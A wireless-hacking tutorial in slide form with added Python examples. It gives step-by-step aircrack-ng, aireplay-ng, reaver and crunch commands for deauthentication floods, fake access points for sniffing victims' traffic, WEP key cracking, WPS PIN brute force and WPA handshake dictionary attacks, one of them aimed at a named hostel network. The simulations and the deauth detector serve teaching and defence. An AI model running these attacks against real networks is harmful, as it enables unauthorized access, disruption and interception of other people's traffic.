This presentation introduces practical techniques used by attackers to break wireless security.
We recommend that the reader have basic knowledge of how wireless networks operate.
The slides cover what wireless hacking is, the Wi-Fi security types (WEP, WPA, WPA/PSK) and the terms related to them, and then how each is cracked, with the tools and commands required. This is very useful. Catch it! :)
5. Network Basics
A network is a number of devices connected together to share data and resources.
All devices, wired or wireless, work on the same principle: one device acts as a server holding the data that is shared with the connected devices. In most home Wi-Fi setups the "server" is the router and the shared resource is the Internet connection.
Every network interface has a MAC address, and every frame carries a source and a destination MAC address. Nothing in plain 802.11 stops a card from reading those addresses in other people's frames or from transmitting frames with someone else's MAC address in them; most of the attacks below rely on that.
7. Wireless Modes
There are eight modes that 802.11 wireless cards can operate in: Master (acting as an access point), Managed (client, also known as station), Ad hoc, Repeater, Mesh, Wi-Fi Direct, TDLS and Monitor mode.
We are only going to talk about two of them:
Managed Mode: the Wi-Fi card acts as a client; only frames addressed to the card (plus broadcasts) are passed up to us.
Monitor Mode: the Wi-Fi card (NIC) passes up every 802.11 frame it hears on its channel, management frames included, whether or not the frame is addressed to it, and without associating to any AP.
8. Sniffing using airodump-ng
Airodump-ng is part of the aircrack-ng package. It is a packet sniffer that captures all the packets within range of our Wi-Fi card, and it also lists all the Wi-Fi networks around us (BSSID, channel, encryption, ESSID) and the clients talking to them.
Using airodump-ng (the card must first be put into monitor mode):
> airmon-ng start [interface]
> airodump-ng [mon_interface]
airmon-ng prints the name of the monitor interface it creates (typically wlan0mon for wlan0); that is the interface every later command uses.
10. Let's see how we can narrow the view down to only our target.
For instance, I only want to see BMSCE_Hostel, so I lock airodump-ng to its channel and BSSID and write everything to a file:
> airodump-ng --channel [CH] --bssid [BSSID] --write [filename] [interface]
The capture is written as [filename]-01.cap (the number increases on each run).
12. De-auth Attack
This attack disconnects any device from any network within range, whether or not the network is protected with a key, because deauthentication frames are unauthenticated management frames in plain 802.11.
The attacker sends deauthentication frames to the router pretending to be the target machine (by spoofing its MAC address), and at the same time sends frames to the target machine pretending to be the router, telling it that it must re-authenticate.
We will use a tool called aireplay-ng:
> aireplay-ng --deauth [number of packets] -a [AP's BSSID] [INTERFACE]
-- To de-authenticate all clients of a specific network (a count of 0 keeps sending until you stop it)
> aireplay-ng --deauth [number of packets] -a [AP's BSSID] -c [target's MAC] [INTERFACE]
-- To de-authenticate a specific client of a specific network
Caveat: networks that use Protected Management Frames (802.11w) authenticate deauthentication frames, so clients that support it ignore forged ones.
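To make concrete what the sniffer on slides 8 to 10 extracts and what the attack on slide 12 puts on the air, here is an added example (not part of the original slides and not aircrack-ng code) that builds and parses raw 802.11 frames in memory: beacons carrying the SSID, channel and privacy bit that airodump-ng lists, a data frame that ties a station to its BSSID, and deauthentication frames forged with the AP's address. The same parser is turned around for the defender, counting deauth frames per (sender, target) pair to flag a flood. The BSSID, client MAC, ESSID, reason code and the whole "capture" are constructed values, not traffic from a card.

```python
import struct
from collections import Counter, defaultdict

MGMT, DATA = 0, 2           # frame control type field
BEACON, DEAUTH = 8, 12      # management subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def header(ftype, subtype, addr1, addr2, addr3, flags=0, seq=0):
    """24-byte 802.11 MAC header: frame control, duration, 3 addresses, sequence control."""
    fc0 = (subtype << 4) | (ftype << 2)            # protocol version 0
    return (struct.pack("<BBH", fc0, flags, 0) + mac(addr1) + mac(addr2) + mac(addr3)
            + struct.pack("<H", seq << 4))


def build_beacon(bssid, ssid, channel, privacy=True):
    cap = 0x0001 | (0x0010 if privacy else 0)      # capability: ESS + Privacy (WEP/WPA in use)
    body = struct.pack("<QHH", 0, 100, cap)        # timestamp, beacon interval, capability
    body += bytes([0, len(ssid)]) + ssid.encode()  # IE 0: SSID
    body += bytes([3, 1, channel])                 # IE 3: DS parameter set (channel)
    return header(MGMT, BEACON, BROADCAST, bssid, bssid) + body


def build_data(station, bssid, payload=b""):
    # To-DS data frame: addr1 = BSSID, addr2 = transmitting station, addr3 = final destination
    return header(DATA, 0, bssid, station, BROADCAST, flags=0x01) + payload


def build_deauth(target, bssid, reason=7):
    # What a deauth flood looks like: addr2 forged as the AP; reason 7 = class 3 frame from a
    # non-associated station (a constructed choice here; any code disconnects the client)
    return header(MGMT, DEAUTH, target, bssid, bssid) + struct.pack("<H", reason)


def parse_frame(raw):
    fc0, flags = raw[0], raw[1]
    f = {"type": (fc0 >> 2) & 3, "subtype": fc0 >> 4, "to_ds": bool(flags & 1),
         "addr1": mac_str(raw[4:10]), "addr2": mac_str(raw[10:16]), "addr3": mac_str(raw[16:22])}
    body = raw[24:]
    if f["type"] == MGMT and f["subtype"] == BEACON:
        f["privacy"] = bool(struct.unpack_from("<H", body, 10)[0] & 0x0010)
        i = 12                                     # tagged parameters start after the fixed fields
        while i + 2 <= len(body):
            tag, ln = body[i], body[i + 1]
            val = body[i + 2:i + 2 + ln]
            if tag == 0:
                f["ssid"] = val.decode(errors="replace")
            elif tag == 3:
                f["channel"] = val[0]
            i += 2 + ln
    elif f["type"] == MGMT and f["subtype"] == DEAUTH:
        f["reason"] = struct.unpack_from("<H", body)[0]
    return f


def survey(frames):
    """The table airodump-ng builds: APs from beacons, associated stations from To-DS data frames."""
    aps, stations = {}, defaultdict(set)
    for f in map(parse_frame, frames):
        if f["type"] == MGMT and f["subtype"] == BEACON:
            ap = aps.setdefault(f["addr3"], {"essid": f.get("ssid", ""), "channel": f.get("channel"),
                                             "privacy": f["privacy"], "beacons": 0})
            ap["beacons"] += 1
        elif f["type"] == DATA and f["to_ds"]:
            stations[f["addr1"]].add(f["addr2"])
    return aps, dict(stations)


def detect_deauth_flood(frames, threshold=5):
    """Defender's view: a real AP sends deauths rarely, so a burst from one BSSID is an attack."""
    counts = Counter()
    for f in map(parse_frame, frames):
        if f["type"] == MGMT and f["subtype"] == DEAUTH:
            counts[(f["addr2"], f["addr1"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


# Constructed capture: 3 beacons, one client data frame, then a deauth flood against everyone
# and against that one client, the two forms the aireplay-ng commands on slide 12 produce.
AP, CLIENT = "11:22:33:44:55:66", "aa:bb:cc:dd:ee:ff"
CAPTURE = ([build_beacon(AP, "BMSCE_Hostel", 6)] * 3
           + [build_data(CLIENT, AP, b"\xaa\xaa\x03")]
           + [build_deauth(BROADCAST, AP)] * 10
           + [build_deauth(CLIENT, AP)] * 10)

if __name__ == "__main__":
    print(survey(CAPTURE))
    print(detect_deauth_flood(CAPTURE))
```

A wireless IDS does the same counting on a monitor-mode card; the threshold and window are tuning choices, and the only real fix is 802.11w, which makes forged deauth frames fail their integrity check.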
14. Creating a Fake AP (honeypot)
Fake access points are usually left open so that more people connect to them, and the attacker sniffs the traffic passing through.
To set one up we need two network cards:
1. NIC1: connected to the Internet (can be wired), so the victims' traffic is forwarded and nothing looks wrong to them.
2. NIC2: broadcasts the fake AP.
17. WEP is an old encryption scheme, but it is still used on some networks.
It uses the RC4 stream cipher.
Each packet is encrypted by the sender and decrypted by the receiver, in both directions between AP and client.
WEP tries to give each packet a unique keystream by prepending a 24-bit Initialization Vector (IV) to the secret key; the IV is sent in the frame as plain text.
Now, what do you think is the flaw in this encryption?
24 bits is a very small space. On a busy network we soon get two packets with the same IV (by the birthday bound, a repeat is likely after only a few thousand packets), and since the per-packet RC4 key is just IV || WEP key, a repeated IV means a repeated keystream. Two ciphertexts under the same keystream XOR to the XOR of their plaintexts, and the first bytes of every frame (the LLC/SNAP header) are known anyway, so keystream bytes leak directly.
With enough captured IVs, aircrack-ng determines the WEP key with statistical attacks (the PTW attack in current versions).
There are two cases to handle:
Basic case: the network is busy, i.e. a large number of packets are transferred between sender and receiver.
Idle AP: the network is quiet, there is little or no packet exchange, or no clients are connected at all.
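The IV-reuse flaw described on slide 17, worked through in code as an added example (not part of the original slides and not aircrack-ng's implementation): a plain RC4 keystream generator, WEP-style encryption with the IV prepended to the key, and three things the attacker gets from it: the XOR of two plaintexts from two frames with the same IV, the keystream prefix from one frame whose first bytes (the LLC/SNAP header of an ARP packet) are known, and the birthday-bound estimate of how many packets it takes before an IV repeats. The key, IV and packet contents are constructed values.

```python
import math
import zlib


def rc4(key: bytes, nbytes: int) -> bytes:
    """Plain RC4 keystream (KSA + PRGA); WEP seeds it with IV || secret key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(nbytes):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP data field: IV (3 bytes, clear) || key index || RC4(IV||key) XOR (payload || CRC-32 ICV)."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + b"\x00" + xor(payload + icv, rc4(iv + key, len(payload) + 4))


def wep_decrypt(key: bytes, frame: bytes):
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4(iv + key, len(body)))
    payload, icv = plain[:-4], plain[-4:]
    return payload, zlib.crc32(payload).to_bytes(4, "little") == icv


# Every encrypted IP/ARP frame starts with the LLC/SNAP header, so the attacker already
# knows these plaintext bytes (an ARP packet ends the header with ethertype 0x0806).
SNAP_ARP = bytes.fromhex("aaaa030000000806")


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """C XOR known P = keystream: one frame with a guessable prefix leaks keystream bytes for its IV."""
    return xor(frame[4:4 + len(known)], known)


def iv_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV: C1 XOR C2 = P1 XOR P2, with no key involved at all."""
    assert frame_a[:3] == frame_b[:3], "frames must share an IV"
    n = min(len(frame_a), len(frame_b)) - 4
    return xor(frame_a[4:4 + n], frame_b[4:4 + n])


def packets_for_iv_collision(prob: float = 0.5, iv_bits: int = 24) -> float:
    """Birthday bound: packets to see some IV twice with probability `prob` (about 4,800 for 50%)."""
    return math.sqrt(2 * (2 ** iv_bits) * math.log(1 / (1 - prob)))


# Constructed traffic: a 40-bit WEP key, one IV used twice (the flaw), an ARP request and
# an IP packet carrying something the attacker wants to read.
WEP_KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("a1b2c3")
ARP_REQ = SNAP_ARP + bytes.fromhex("0001080006040001") + bytes(20)
SECRET_IP = SNAP_ARP[:6] + bytes.fromhex("0800") + b"secret ip payload"
FRAME_ARP = wep_encrypt(WEP_KEY, IV, ARP_REQ)
FRAME_IP = wep_encrypt(WEP_KEY, IV, SECRET_IP)

if __name__ == "__main__":
    ks = keystream_from_known_plaintext(FRAME_ARP, SNAP_ARP)
    print("keystream prefix for IV", IV.hex(), "=", ks.hex())
    print("other frame's prefix:", xor(FRAME_IP[4:12], ks))
    print("packets for a 50% IV collision:", round(packets_for_iv_collision()))
```

The statistical attacks in aircrack-ng go one step further: given many (IV, first keystream byte) pairs recovered exactly like this, they rank the likely key bytes, which is why the ARP replay on slide 22 is about collecting IVs rather than any particular payload.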
18. Tackling the Basic Case:
This is the easy one. We run airodump-ng to log all the traffic of the target network:
> airodump-ng --channel [CH] --bssid [BSSID] --write [filename] [interface]
Ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out wlan0mon
At the same time we run aircrack-ng against the growing capture file; it retries automatically as more IVs arrive:
> aircrack-ng [filename]
Ex: aircrack-ng out-01.cap
20. The Idle AP case
In this case we have to inject packets into the traffic to force the router to create new packets with new IVs.
Before we can inject anything, we have to authenticate our Wi-Fi card with the AP, because APs ignore frames from stations that are not associated with them.
This is easily done with aireplay-ng:
> aireplay-ng --fakeauth 0 -a [target MAC] -h [our MAC] [interface]
If the fake authentication succeeds, the value under the AUTH column in airodump-ng changes to "OPN".
21. Now that we are authenticated with the AP, we can use a method called
• ARP Request Replay
22. ARP Request Replay
In this method, after authenticating with the target AP, we wait for an ARP request. Even though it is encrypted, an ARP request is recognisable by its fixed size.
We capture this packet and inject it back into the traffic again and again.
Every time the AP relays it, it re-encrypts it under a new IV.
This is repeated until the number of captured IVs is sufficient to crack the key.
> aireplay-ng --arpreplay -b [target MAC] -h [our MAC] [interface]
27. WPS (Wi-Fi Protected Setup)
WPS is a feature that lets users join WPS-enabled networks by pressing a WPS push button or by entering a PIN instead of the passphrase.
PIN authentication uses an 8-digit PIN. That is already a small space, and it is smaller than it looks: the last digit is a checksum, and the AP confirms each half of the PIN separately during the exchange, so at most 10,000 + 1,000 = 11,000 guesses are needed. It can simply be brute forced.
A tool called reaver guesses the PIN, and once the PIN is accepted the AP hands over the WPA/WPA2 key.
28. We use a tool called wash to scan for WPS-enabled networks nearby:
> wash -i [interface]
29. As mentioned, reaver is used to recover the WPS PIN and from it the WPA PSK (explained in the coming slides):
> reaver -b [target BSSID] -c [channel] -i [interface]
Many APs lock WPS for a while after a few failed PINs, which slows the attack down; on the defending side the fix is to disable WPS PIN mode altogether.
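Why reaver's brute force is feasible, as an added example (not part of the original slides and not reaver's code): the WPS PIN checksum, a stand-in for the AP that answers the way the real registrar protocol does (a NACK after message M4 when the first half is wrong, a NACK after M6 when the second half is wrong), and the split search that uses those answers. The PIN value and the attempt counter are constructed for the illustration.

```python
def wps_checksum(first7: int) -> int:
    """Checksum digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the first seven digits."""
    accum, pin = 0, first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class WpsEnrollee:
    """Stand-in for the AP side of the WPS exchange. The real protocol proves knowledge of the
    PIN in two halves, and the AP aborts as soon as a half is wrong; that is the whole flaw."""

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self.pin = pin
        self.attempts = 0            # a real AP would rate-limit or lock WPS after a few of these

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK after M4"   # first half rejected, second half never examined
        if pin[4:] != self.pin[4:]:
            return "NACK after M6"   # first half accepted, second half rejected
        return "M7"                  # success: M7 carries the network's WPA credentials


def recover_pin(ap: WpsEnrollee):
    """Split brute force as reaver does it: first half alone, then the 3 free digits + checksum."""
    first = None
    for h in range(10_000):
        if ap.try_pin(f"{h:04d}0000") != "NACK after M4":
            first = f"{h:04d}"
            break
    if first is None:
        return None
    for s in range(1_000):
        pin = f"{first}{s:03d}{wps_checksum(int(first) * 1000 + s)}"
        if ap.try_pin(pin) == "M7":
            return pin
    return None


MAX_ATTEMPTS = 10_000 + 1_000        # versus 10**8 if the PIN were checked as a whole

if __name__ == "__main__":
    ap = WpsEnrollee("12345670")     # constructed PIN (12345670 is a well-known default)
    print(recover_pin(ap), "found after", ap.attempts, "attempts; worst case", MAX_ATTEMPTS)
```

Each attempt is a full WPS exchange of several frames, so even 11,000 attempts take hours on a real AP, and lockouts stretch that further; the point is that the search is bounded by thousands of tries, not by a 10^8 keyspace.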
31. In WPA, each packet is encrypted with a temporal key that is unique to the session, so the amount of data we collect is irrelevant: no number of data packets will leak the key as they did with WEP.
THIS IS A PROBLEM!
Before trying to get into a WPA/WPA2 network, we need to know how it works.
When a client (supplicant) connects to an AP (authenticator), a 4-way handshake takes place to derive and confirm the encryption keys.
32. Key Terminology:
MSK (Master Session Key): the first key in the hierarchy, produced by the 802.1X/EAP exchange in enterprise mode. In pre-shared key mode there is no EAP exchange and the hierarchy starts from the passphrase instead.
GTK (Group Temporal Key): used to encrypt all broadcast and multicast traffic between an access point and its client devices. The GTK is shared between all clients associated with one access point; every access point has its own GTK.
GMK (Group Master Key): the key from which the access point generates its GTK, which it then distributes to its associated clients (in message 3 of the 4-way handshake and in the group key handshake).
33. PTK (Pairwise Transient Key): used to encrypt all unicast traffic between one client station and the access point, so it is unique to that pair. Both sides derive it from the same inputs:
PTK = PRF-X(PMK, "Pairwise key expansion", min(AA, SPA) || max(AA, SPA) || min(ANonce, SNonce) || max(ANonce, SNonce))
where AA is the AP's MAC address, SPA the station's MAC address, and ANonce and SNonce the random nonces sent in messages 1 and 2 of the handshake. The PTK is split into the KCK (used for the MIC over handshake messages), the KEK (used to wrap the GTK) and the TK (used to encrypt data).
PMK (Pairwise Master Key): derived from the MSK in enterprise mode; in PSK mode it is computed as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). It is used to generate the PTK.
38. WPA data packets are not useful, as they contain no information that helps crack the key.
The only packets that do are the handshake packets:
• Every time a client connects to the AP, a 4-way handshake occurs, as explained.
• The handshake messages carry the nonces and a MIC computed with a key derived from the passphrase, so by capturing the handshake we can use aircrack-ng to launch a wordlist attack against it.
39. Capturing a Handshake
Handshake packets are sent every time a client associates with the target AP.
1. Start airodump-ng on the target AP:
> airodump-ng --channel [CH] --bssid [BSSID] --write [filename] [interface]
2. Wait for a client to connect to the AP. But do we have that much time? Think of a network where no new client is likely to connect for days, or years in some cases.
Do we know something which can help? The de-auth attack!
We de-authenticate a connected client for a short moment so that it reconnects to the AP automatically, and airodump-ng captures the fresh handshake:
> aireplay-ng --deauth [number of packets] -a [AP MAC] -c [target MAC] [interface]
airodump-ng shows "WPA handshake: [BSSID]" in its top line once the capture file contains one.
42. Creating a wordlist
You can either download a wordlist from the internet (I'll be sharing links 🧐) or create your own with a tool called crunch:
> crunch [min] [max] [charset] -t [pattern] -o [file]
With -t, min and max must equal the pattern length, and @ marks the positions that vary.
Ex: crunch 6 6 '123456!"$*' -t a@@@@b -o wordlist
(quote the charset, otherwise the shell interprets the !, " and * characters)
43. Now that we have a wordlist, the only thing left is to use aircrack-ng to crack the key.
For each candidate passphrase in the wordlist, aircrack-ng combines it with the AP name (ESSID) to compute the Pairwise Master Key (PMK), derives the PTK from the PMK with the MAC addresses and nonces from the captured handshake, and compares the resulting MIC with the one in the handshake. The PBKDF2 step is slow by design (4096 iterations per candidate), which is why a good wordlist matters more than raw speed.
> aircrack-ng [Handshake file] -w [wordlist]
Ex: aircrack-ng handshake-01.cap -w listpass
The only real defence is a long random passphrase that no wordlist contains (or WPA3, whose SAE handshake does not allow offline guessing at all).
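The PTK derivation on slide 33 and the wordlist attack on slide 43 carried through in code, as an added example (not part of the original slides and not aircrack-ng's implementation): PBKDF2 for the PMK, the 802.11i PRF for the PTK, the MIC over an EAPOL-Key message 2 computed with the KCK, and a dictionary loop that recomputes that MIC per candidate. Since no real capture is available here, a handshake is constructed in memory from a known passphrase; the ESSID, MAC addresses, nonces, passphrase and wordlist are constructed values. The PBKDF2 step is checked against the IEEE 802.11i Annex H test vector ("password" / "IEEE").

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK mode PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, nbytes: int = 48) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(AA,SPA) || min/max(ANonce,SNonce)).
    48 bytes for CCMP: KCK (16) || KEK (16) || TK (16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def build_eapol_msg2(snonce: bytes, key_descriptor_version: int = 2, key_data: bytes = b"") -> bytes:
    """EAPOL-Key message 2 of 4 (supplicant -> AP), MIC field zeroed."""
    key_info = 0x0108 | key_descriptor_version       # Pairwise (bit 3) + MIC (bit 8) + version
    body = struct.pack(">BHH", 2, key_info, 0)       # descriptor type RSN, key info, key length
    body += struct.pack(">Q", 1)                     # replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8) # key nonce, key IV, key RSC, key ID
    body += bytes(16)                                # MIC placeholder
    body += struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body   # 802.1X: version 2, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL frame with the MIC field zeroed; algorithm per key descriptor version."""
    version = struct.unpack_from(">H", eapol, 5)[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    if version == 1:                                 # WPA/TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                 # WPA2/CCMP: HMAC-SHA1-128
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise NotImplementedError("version 3 (AES-128-CMAC) not handled in this example")


def simulate_capture(passphrase, ssid, aa, spa, anonce, snonce):
    """Constructed stand-in for a handshake captured by airodump-ng: just what cracking needs."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    eapol = build_eapol_msg2(snonce)
    mic = eapol_mic(ptk[:16], eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol": eapol}


def crack_handshake(capture, wordlist):
    """The aircrack-ng loop: PBKDF2 per candidate, then PTK, then MIC compare. None if not in list."""
    observed = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:             # WPA passphrases are 8 to 63 characters
            continue
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), observed):
            return candidate
    return None


# Constructed handshake and wordlist.
AP_MAC = bytes.fromhex("112233445566")
CLIENT_MAC = bytes.fromhex("aabbccddeeff")
ANONCE = bytes(range(32))            # real nonces are random; fixed here so the run is reproducible
SNONCE = bytes(range(32, 64))
CAPTURE = simulate_capture("hostel2016", "BMSCE_Hostel", AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
WORDLIST = ["short", "password", "12345678", "bmsce1234", "hostel2016", "letmein1"]

if __name__ == "__main__":
    print("KEY FOUND:", crack_handshake(CAPTURE, WORDLIST))
```

Every candidate costs 4096 HMAC-SHA1 rounds before the cheap MIC compare, and the PMK depends on the ESSID, so a precomputed table only helps against one network name; this is also why aircrack-ng needs the ESSID (from the beacon in the capture or via -e) and not just the four EAPOL frames.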